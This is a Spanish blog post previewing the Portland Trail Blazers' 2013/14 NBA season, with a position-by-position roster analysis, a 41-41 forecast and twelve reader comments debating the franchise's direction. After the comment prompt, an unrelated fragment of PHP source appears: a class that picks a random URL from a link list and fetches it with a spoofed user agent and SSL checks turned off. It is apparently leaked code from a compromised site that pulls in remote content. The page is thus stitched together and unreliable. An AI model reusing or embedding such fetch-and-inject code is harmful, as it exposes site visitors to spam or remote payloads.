Portland TrailBlazers: En tierra de nadie

03 de October de 2013 por Love Denise

Lamarcus Lillard BatumEn la 2010/2011 los Blazers caían en primera ronda de Playoffs ante los Mavs, que acabarían llevandose el anillo. Esa fue la última temporada de Brandon Roy y Greg Oden en el equipo, dos frágiles pilares junto a LaMarcus Aldridge en los cuales los Blazers habían cimentado su proyecto de reconstrucción unos años atrás.

Tras dar por concluida esta etapa, los Blazers han vivido los dos últimos años con un proyecto que va a la deriva, como un trozo de madera lanzado al río por algún niño que si la corriente quiere quedará atrancada en algún meandro o, si hay suerte, no tropezará con ningún obstaculo y llegará hasta el mar.

Decimos esto porque desde hace dos años los Blazers viven en tierra de nadie, con un proyecto improvisado en el que las cabezas pensantes y los que manejan los billetes no se deciden ni por apostar fuerte y pujar por grandes agentes libres que acerquen el anillo al Rose Garden (ahora Moda Center) ni tampoco por reconstruir el equipo apostando por jugadores jóvenes, más allá de la primera ronda de turno que eligen en el Draft.

A traves de esta vía sí han tenido la suerte que no tuvieron con la plaga de lesiones del pasado. Un año atrás, los Blazers se hacían en el pick 6 con el base Damian Lillard, y el californiano respondió echandose el equipo a las espaldas y aplastando a sus rivales en la lucha por el Rookie del año.

Para esta temporada, el objetivo es el mismo, intentar conseguir uno de los últimos puestos de playoffs y poco más. Esta poca ambición mostrada por una franquicia cuyo propietario es Paul Allen, el propietario más rico de la NBA gracias a ser el cofundador de Microsoft, ha hecho que su jugador franquicia, LaMarcus Aldridge, empiece a estar harto de esta situación y, viendo que se le pasa el arroz, durante este verano ha llegado incluso a pedir un traspaso.

Los movimientos para tranquilizar a LaMarcus, y de paso a la afición, no han sido malos, pero tampoco son esperanzadores y suficientes como para que los Blazers sean candidatos al anillo a corto plazo. Partiendo de la base de que el año pasado contaban con el peor banquillo de la liga, la tarea de mejorar el equipo era fácil y los tiros han ido por reforzar el banco con gente como Mo Williams, Dorrel Wright y Thomas Robinson manteniendo la columna vertebral del equipo intacta.

Salvo sorpresas de última hora, los Blazers tienen a día de hoy la plantilla cerrada con sus 15 jugadores con contratos garantizados. La plantilla dirigida por Terry Stotts queda configurada de la siguiente forma:

Bases: Damian Lillard será el conductor del equipo y probablemente el jugador franquicia en los próximos años. Un jugón en toda regla, una futura megaestrella, 19 puntos y 6’5 asistencias fueron su carta de presentación en la mejor liga del mundo. Indiscutible rookie del año 2013, a nivel personal, su objetivo debe centrarse en aumentar su número de asistencias y participar en el All-Star Game. Para darle minutos de descanso, los Blazers se han movido bien firmando a Mo Williams por 5’4 millones en 2 años. El base viene de hacer una notable temporada en Utah y probablemente jugará algunos minutos de 2′ al lado de Lillard.

Como tercer base parte el veterano Earl Watson, a priori no tendrá un gran rol en el equipo y su apariciones en cancha serán testimoniales.

Escoltas: El SG titular debe ser Wesley Matthews, buen anotador, el texano asegura puntos desde el triple y unos cuantos partidazos bordeando la treintena de puntos a lo largo del año. Para disputarle minutos, los Blazers eligieron en el puesto 10 de este último Draft al combo-guard C.J. McCollum, un anotador compulsivo cuyas dudas pueden venir por su poco físico que le puede pasar factura a la hora de defender y tambien de penetrar en ataque ante los gigantes que pululan por la zona. Sus 23,9 puntos en la pasada NCAA y sus 21 puntos de media este verano en la Summer League de Las Vegas le convierten en un jugador a tener en cuenta cuyo rol podría ser el de revulsivo microondas desatascador de partidos.

A la espera de oportunidades, quedarán dos decentes anotadores como Will Barton y Allen Crabbe, número 31 del pasado Draft y que llega a Portland via Cleveland.

blazers

Aleros: El jugoso contrato firmado el verano pasado por Nicolas Batum no le alteró su rendimiento en pista y el francés se marcó una excelente temporada aportando como siempre en todas las facetas del juego.  Formidable jugador de equipo, volverá a ser sin dudas el alero titular y el encargado de emparejarse en defensa con los jugones exteriores del equipo contrario. La primera opción por detrás de él será la de Dorrell Wright. Llegado este verano desde Philadelphia, el campeón de la NBA en 2006 es un portento físico con fundamentos para anotar pero bastante vago y apatico en ocasiones.

Como última opción para el small-forward se encuentra Víctor Claver, su primera temporada en la NBA fue realmente mala teniendo en cuenta que el español no era un rookie al uso, sino un jugador de 24 años con experiencia en los más importantes campeonatos internacionales y en las mejores competiciones del Viejo Continente. Salvo que se quite los miedos de la cabeza e introduzca sangre y ganas a su juego, su futuro es bastante negro en la mejor liga del mundo.

Ala-Pivots:  LaMarcus Aldridge volverá a ser otro año más el jugador franquicia del equipo, pero como ya hemos comentado, podríamos estar ante su última campaña en Portland. Con 28 años y tras 7 años en la liga, el bueno de LaMarcus aún no ha tenido la oportunidad de pasar la primera ronda de Playoffs, y este año parece que tampoco va a ser, al menos vistiendo la camiseta Blazer.

Como segunda opción, entra en escena Thomas Robinson. Su año rookie fue lamentable dejando una pésima imagen tanto en Sacramento como en Houston a donde fue traspasado en febrero. En su temporada sophomore intentará demostrar el potencial que se le presupone y de paso justificar el pick 5 con el que fue elegido. Al final de la rotación se encuentra Joel Freeland. Al igual que en el caso de Claver, si quiere sentirse útil, creemos que la mejor opción para el inglés sería volverse a Europa donde si ha demostrado poder ser un 4 dominante bajo aros.

Pivots: J.J. Hickson se fue rumbo a Denver, y para reemplazarlo, los Blazers han confiado en Robin López. A priori, gran movimiento para los Blazers que se hicieron con  el menos bueno de los hermanos López a cambio de un par de segundas rondas. El pivot viene de cuajar una interesante campaña en los Hornets yéndose por encima de los 11 puntos y 5 rebotes en poco más de 26 minutos, y este año en Portland tendrá bastantes minutos para seguir progresando como jugador.

Por detrás, viene pisando fuerte Meyers Leonard, el cual aprovechó los minutos y la confianza dada por el entrenador, para realizar una notable temporada rookie yendo claramente de menos a más y acabando los dos últimos meses de competición con promedios de 7’5 puntos y casi 5 rebotes en 20 minutos. El ex-marine debería consagrarse esta temporada como un sólido pivot de rotación y por qué no, intentar disputarle la titularidad a López.

5 INICIAL: Damian Lillard – Wesley Matthews – Nicolas Batum – Lamarcus Aldridge- Robin Lopez

6º hombre: Mo Williams

Altas: Mo Williams, Earl Watson, C.J. McCollum, Allen Crabbe, Dorrell Wright, Thomas Robinson, Robin Lopez

Bajas: J.J. Hickson, Terrell Harris, Eric Maynor, Luke Babbitt, Nolan Smith, Sasha Pavlovic, Jared Jeffries.

UNA VIRTUD: Capacidad anotadora del equipo. Varios jugadores imparables estando on-fire.

UN DEFECTO: Consistencia del equipo y regularidad de sus jugadores, dificilmente conseguiran rachas de mas de 5 victorias seguidas.

Pronóstico: 9º del Oeste. 41-41.

Comenta

12 comentarios a esta entrada

  1. Esteban dice:
    #1

    no me parece que esten tan en tierra de nadie, tienen complicaciones por que pagan salarios demasiado elevados a jugadores como mathews, lopez y batum y ellos no lo llevaran por si a ningun lado,
    si hubiesen podido ir a por howard tendrian un equipo intimidante de aqui a un par de años

    pero tampooc esta todo perdido, el valor de aldrigue es realmente alto y si se quiere un trade pueden sacar algo jugoso por el

    que les parece un anthony bennet y tristan thompson por aldrigue? si bynum se recupera puede que sea una dupla dominante en el este

    mientras tanto los jovenes como lillard y mccollum tienen futuro en la liga y el contrato de mathews es suficientemente bueno como sacar un exelente trae por el

    en fon lo que quiero decir es que no estan en un limbo, si quieren reconstruir, tienen jovenes y contratos buenos para reclutar rondas o trader a jovenes promesas

    si quieren ir a por algo mas, no se, es una pena los contratos para la proxima temporada de whight, lopez, freeland y robinson

    sin ellos y con ese espacio, podrian por una estrella

      Citar

  2. Denise dice:
    #2

    Pero Esteban, tu mismo lo has dicho, “si quieren ir a por algo más”…
    Tal y como me refiero en el articulo, si están a mi juicio en tierra de nadie, ni se deciden por apostar fuerte ni por reconstruir, y eso deriva en que una ciudad como Portland bastante importante en el mapa estadounidense y con el dueño mas rico de la liga no haya hecho prácticamente nada en los últimos 10 años desde que terminase la era Jail Blazers.
    Lo poco destacado que han hecho han sido gracias a los jugadores drafteados (Roy, Aldridgue, Batum, Lillard) pero no han hecho ni un movimiento ambicioso para ir a por algo más, por ilusionar a la gente del Rose Garden, lo que para mi es como un simbolo de dejadez en los despachos del equipo.
    No me extraña que Aldridge quiera pirarse ya, como siga así será el nuevo T-Mac y llegará a retirarse sin apenas pasar de primera ronda.

      Citar

  3. Esteban dice:
    #3

    Denise, hoy estan en tierra de nada pero estan a solo un paso de ser un equiipo competitivo o un equipo joven con proyeccion

      Citar

  4. Denise dice:
    #4

    Esteban:
    Denise, hoy estan en tierra de nada pero estan a solo un paso de ser un equiipo competitivo o un equipo joven con proyeccion

    Pues llevan 10 años a ese solo paso, y a dia de hoy para ser un equipo Top, tendrían que traspasar a su jugador franquicia Lamarcus, porque con Batum, Matthews, Robin, etc..estan hipotecados.

      Citar

  5. Simon dice:
    #5

    Lo siento pero no puedo estar mas en desacuerdo. Si consideramos a los Blazers en tierra de nadie entonces hay que considerar en ese terreno aproximadamente al 60% de la liga. El año pasado compitieron excelentemente para ser un equipo en construcción y esta temporada han incorporado a 5 jugadores de buen nivel que van a darles ese plus quele faltaba el año pasado. Si no son PO asegurados es ni mas ni menos por lo duro que es el Oeste hoy en dia… aunque este año creo que si el equipo se acopla bien losvamos a tener en postemporada si o si.

    Por otro lado creo que si consideras que van a estar apenas al 50% ni de coña van a ser 9º de conferencia…

      Citar

  6. Esteban dice:
    #6

    Comparto simon, su 5 inicial es muy fuerte y balanceado y la banca, no es una maravilla pero mo y mccollum puede aportar reevulsion, hasta watson puede rendir, wright es una mejora a claver y robinson bueno, no me desagrada tanto, algo puede aportar

    Postempoprada ni de coña pero si un 50%

      Citar

  7. txusma dice:
    #7

    Pues yo lo doy gracias todos los días a equipos como Hawks, Bucks o Blazers que pelean por entrar en playoffs aunque sepan que no tienen lo suficiente para luchar por el anillo.

      Citar

  8. Denise dice:
    #8

    Simon:
    Lo siento pero no puedo estar mas en desacuerdo. Si consideramos a los Blazers en tierra de nadie entonces hay que considerar en ese terreno aproximadamente al 60% de la liga.

    ¿Que equipos son esos, Simon?¿Quienes forman el 60%? Una cosa es quedar en tierra de nadie pero al menos apostar por buenos jugadores, y otra cosa es lo de los Blazers, que no fichan a nadie importante desde hace mas de una decada.
    A bote pronto, en los ultimos años todos los equipos han fichado a All-Stars ó potenciales All-stars para dar un salto de calidad, los Blazers no han movido ni un dedo. El lema en Oregón será “drafteamos lo que sea y con eso tiramos para adelante”

      Citar

  9. Denise dice:
    #9

    txusma:
    Pues yo lo doy gracias todos los días a equipos como Hawks, Bucks o Blazers que pelean por entrar en playoffs aunque sepan que no tienen lo suficiente para luchar por el anillo.

    Pero los Bucks lo han intentado con Monta Ellis, los Hawks firmaron a Jo-Jo, Bibby; ahora se va Smith y mas pronto fichan a Millsap. Pero lo de los Blazers es una dejadez absoluta del proyecto.

      Citar

  10. Simon dice:
    #10

    Hombre no es dejadez, simplemente en los últimos años han tenido mala suerte con dos jugadores que estaban llamados a ser futuros Hall of fame… Sin las lesiones han tenido que reinventarse sin espacio salarial, y ninguna temporada han dejado de competir, tienen al actual ROY, el año pasado firmaron un contrato a uno de los AL mas importantes del mercado y tienen probablemente a uno de los 5 mejores ala pivots… ¿ que hubieras hecho tu sin espacio salarial este verano para no estar en tierra de nadie ? lo mismo que los Sixers??
    Opino como Txus, hay que dar gracias a estos equipos año a año puesto que si no la liga seria una mierda…
    Creo que estás perdiendo la perspectiva de que son los Blazers actuales, un equipo en construcción que debe alcanzar su máximo esplendor de aqui a dos o tres años si todo va bien… Sin las lesiones creo que Blazers hubiera sido el dominador de la conferencia los ultimos 3 años y por muchos años más…

      Citar

  11. rumbero dice:
    #11

    Simon:
    Hombre no es dejadez, simplemente en los últimos años han tenido mala suerte con dos jugadores que estaban llamados a ser futuros Hall of fame… Sin las lesiones han tenido que reinventarse sin espacio salarial, y ninguna temporada han dejado de competir

    Eso iba a comentar. Hay que tener en cuenta que en el draft del 2006 consiguen a Aldridge y Roy y al año siguiente a Oden. Base como para empezar a montar un contender en unos años. Pero a partir de aquí lesiones de las gordas, las manos atadas y rezándole a todos los santos. Tenían complicado hacer otra cosa la verdad.

    Yo para este año los veo dando bastante guerra. Las últimas plazas del oeste se pueden decidir por una lesión o una mala racha y estos tios estuvieron peleando casi hasta el final de la temporada pasada prácticamente con 6 jugadores. De Mo Williams y Wright ya sabemos más o menos que esperar, a ver que son capaces de hacer McCollum y Robinson (yo con este tengo bastante más fe de lo que leo por aquí). Y a todo esto a ver donde tiene el techo Lillard claro, que no hay que olvidarse que el año pasado les salvó los muebles muchísimos partidos

      Citar

  12. Sancho88 dice:
    #12

    A ver, no perdamos la perspectiva. Blazers son un buen equipo con Lillard-Batum-Aldridge como eje principal y otros jugadores como Mo Williams, Wes Mathews, Dorrell Wright y Robin López como buenos secundarios. Como bien habéis dicho, entrar en Playoffs en el Oeste es prácticamente una quimera. Dependerá mucho del salto adelante de la banca, que fue la peor el año pasado de toda la liga, y el desarrollo de jugadores como Claver, T-Rob o Leonard. Su rango debería ser entre el 10º y el 8º de Conferencia, y van a pelear todos los partidos. Son un buen equipo que van a competir, no sé, tienen buena pinta. A ver cómo se recupera McCollum, pero en principio tienen un equipo bastante compensado en todas las líneas y si se esfuerzan en defensa van a estar ahí. Aldridge debería estar más motivado que en toda su vida, porque ahora tiene el mejor equipo desde la época de Roy. Veremos qué pasa

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>